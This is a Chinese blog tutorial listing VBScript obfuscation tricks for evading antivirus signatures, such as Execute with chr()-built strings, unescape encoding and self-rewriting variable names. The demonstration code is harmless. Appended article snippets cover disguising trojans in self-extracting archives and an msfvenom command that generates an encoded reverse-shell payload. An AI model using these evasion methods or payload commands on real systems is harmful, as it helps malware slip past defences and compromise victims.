脚本免杀概述

手机打字实在在麻烦,所以一些比较简单或太复杂的代码我就不直接提供实例了。

1、不是方法的方法--加注释


加一些规则无用不含特征码的注释。代码略

2、大小写混编

利用VBS忽略大小写

3、 分行与同行混用

利用冒号(:)连接多行代码为一行

4、一行分多行

使用续行符(_)将一行分多行写

5、利用execute函数

复制代码
代码如下:

Execute("createobject("&chr(34)&"wscript.shell"&chr(34)&chr(41)&".popup
now")

6、字符串分割,& 于 + 连接混用

复制代码
代码如下:

code="creat"+"eobject("&chr(34)+"wscr"&"ipt.she"&"ll"+chr(34)&chr(41)+".popup
now,5"
execute code

7、Excape与Unescape加解密

复制代码
代码如下:

Createobject(unescape("%57%53%43%52%49%50%54%2E%53%48%45%4C%4C"))

ws.popup now,5

8、Execute执行转换后的十进制ASCII

9、Execute执行转换后的十六进制ASCII

以“VBS加密工具”为关键词搜索,可找到提供以上两种加密方式的软件。不过你现在不需要这个软件了,你可以在本空间找到可以完美实现这两种加密方式的VBS。

10、使用自定义函数代替内部函数(封装内部函数)

复制代码
代码如下:

Function t()
t=now()
end function

msgbox t

11、+ - ( ) &等字符两边加任意多空格

12、变量名自动改变

复制代码
代码如下:

RANDOMIZE
set
FSO=createobject("scripting.filesystemobject")

MF=FSO.opentextfile(wscript.scriptfullname,1).readall

ARY=array("FSO","MF","ARY","NUM")
for NUM=0 to 3

MF=REPLACE(MF,ARY(NUM),chr(fix(rnd*25)+65)&chr(fix(rnd*25)+65)&chr(fix(rnd*25)+65)&chr(fix(rnd*25)+65))

next
FSO.opentextfile(wscript.scriptfullname,2,1).write MF

运行以上代码后打开VBS文件,可发现变量已改变
13、加壳

上一种方法仅改变变量,这种方法将所有代码全部打乱并且会每次改变

这个代码最复杂。大家可以上网搜“WINDOWS脚本技术”(好想在51jb.net)。大家可以在这个文件中找到这种加密方法。通过这篇文章你可以学到很多东西。

14、使用官方加密工具
screnc.exe
我空间也有以前介绍

大家可能觉得我只是为了凑数才弄了这么多方法。的确,我这里很多方法没什么意义。但VBS加密方法还远不止这么多。我以前见过几个十分强悍的加密算法,当时没弄懂,现在也忘了,大家可以到网上搜搜

时间: 2024-10-25 02:32:17

脚本免杀概述的相关文章

RAR自解压格式结合vbs脚本免杀捆绑

首先我们必须要认识原理问题.捆绑,几乎都是先将文件释放后在逐个运行,所以被捆绑文件自身必须免杀. 否则,就算捆绑在一起免杀了,运行的时候,一释放,立刻就会被杀掉. 自解压的制作方法我就不说了,洪雨提一下需要注意的一个点. 在框选文件的时候一定要先选择木马,再选择掩护文件,否则报毒几率会高.掩护文件,最好就是杀毒软件自身. 假如我们制作的自解压捆绑文件为1.exe. 如果我们直接设置成解压后运行捆绑的文件,很大程度会被杀. 所以我们需要用到一个vbs来运行木马和伪装程序.将1.exe和vbs文件进

20155236范晨歌_EXP3免杀原理与实践

20155236范晨歌_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒",翻译为"反杀毒技术". 被谁杀?当然是被杀毒软件(引擎)杀.所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的. 恶意代码检测方式 基于特征码的检测 特征库,也就是我们平时说的病毒库,它记录了一些恶意软件的特征码

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe.lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell. 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀. 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 第1步:安装Python2.7和Py2exe 一定要安装32位的Python 2.7和32位的P

20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践 一.实践内容概述 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. AV软

Bypass AV meterpreter免杀技巧

0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单. 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么sending stager er

免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装.我们直接从 github 上进行 clone 下载: git clone https://www.github.com/Veil-Framework/Veil-Evasion.git 图1 下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令: ls cd Ve

Metasploit+python生成免杀exe过360杀毒

Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py 2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变) from ctypes

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

Veil:免杀payload生成工具

http://xiao106347.blog.163.com/blog/static/215992078201310223233644/ 下载安装 git clone https://github.com/veil-evasion/Veil.git   cd Veil/setup/   ./setup.sh 也可以下载zip包,然后解压安装:https://github.com/veil-evasion/Veil 一路回车: 安装之后cd到当前的Veil目录里运行Veil.py(这样就是最新版v